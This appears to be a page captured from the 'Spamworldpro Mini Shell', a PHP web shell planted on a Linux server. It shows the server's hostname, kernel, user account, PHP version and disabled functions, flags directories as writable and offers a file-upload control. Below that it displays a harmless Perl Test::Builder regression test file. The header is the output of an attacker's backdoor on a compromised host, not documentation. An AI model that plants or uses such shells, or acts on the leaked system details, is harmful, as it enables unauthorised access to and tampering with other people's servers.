Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /usr/share/doc/perl-Test-Simple/t/regression/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/doc/perl-Test-Simple/t/regression/662-tbt-no-plan.t
use Test::Builder::Tester;
use Test::More tests => 1;
use strict;
use warnings;

BEGIN {
    package Example::Tester;

    use base 'Test::Builder::Module';
    $INC{'Example/Tester.pm'} = 1;

    sub import {
        my $package    = shift;
        my %args       = @_;
        my $callerpack = caller;
        my $tb         = __PACKAGE__->builder;
        $tb->exported_to($callerpack);
        local $SIG{__WARN__} = sub { };
        $tb->no_plan;
    }
}

test_out('ok 1 - use Example::Tester;');
use_ok('Example::Tester');
test_test("use Example::Tester;");

Spamworldpro Mini